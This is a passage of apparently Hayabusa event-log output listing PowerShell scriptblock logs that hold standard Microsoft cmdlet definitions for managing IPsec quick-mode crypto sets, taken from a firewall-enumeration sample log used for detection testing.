[ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByDisplayGroup', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByGroup', Mandatory=$true)] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetIKEQMCryptoSet')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewDisplayName}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Description}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [ciminstance[]] ${Proposal}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('PfsGroup')] [Microsoft.Windows.Firewall.Commands.DiffieHellmanGroup] ${PerfectForwardSecrecyGroup}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByDisplayGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewDisplayName')) { [object]$__cmdletization_value = ${NewDisplayName} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Description')) { [object]$__cmdletization_value = ${Description} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Proposal')) { [object]$__cmdletization_value = ${Proposal} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Proposals'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Proposals'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PerfectForwardSecrecyGroup')) { [object]$__cmdletization_value = ${PerfectForwardSecrecyGroup} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'PfsGroupID'; ParameterType = 'Microsoft.Windows.Firewall.Commands.DiffieHellmanGroup'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'PfsGroupID'; ParameterType = 'Microsoft.Windows.Firewall.Commands.DiffieHellmanGroup'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecQuickModeCryptoSet.cmdletDefinition.cdxml-Help.xml }",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:06.036 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function Remove-NetIPsecQuickModeCryptoSet { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEQMCryptoSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [Alias('PfsGroup')] [ValidateNotNull()] [Microsoft.Windows.Firewall.Commands.DiffieHellmanGroup[]] ${PerfectForwardSecrecyGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetIKEQMCryptoSet')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PerfectForwardSecrecyGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PerfectForwardSecrecyGroup}) $__cmdletization_queryBuilder.FilterByProperty('PfsGroupID', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecRule') -and (@('ByAssociatedNetIPsecRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecRule}, 'MSFT_NetConSecRuleQMCryptoSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll', 'InputObject (cdxml)') -contains $_ } { $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('cim:DeleteInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecQuickModeCryptoSet.cmdletDefinition.cdxml-Help.xml }",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:06.036 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function Rename-NetIPsecQuickModeCryptoSet { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEQMCryptoSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [Alias('PfsGroup')] [ValidateNotNull()] [Microsoft.Windows.Firewall.Commands.DiffieHellmanGroup[]] ${PerfectForwardSecrecyGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetIKEQMCryptoSet')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName', Mandatory=$true)] [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [Parameter(ParameterSetName='ByQuery', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true)] [Parameter(ParameterSetName='GetAll', Mandatory=$true)] [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true)] [string] ${NewName}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PerfectForwardSecrecyGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PerfectForwardSecrecyGroup}) $__cmdletization_queryBuilder.FilterByProperty('PfsGroupID', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecRule') -and (@('ByAssociatedNetIPsecRule') -contains $PSCmdlet.ParameterSetName )) { 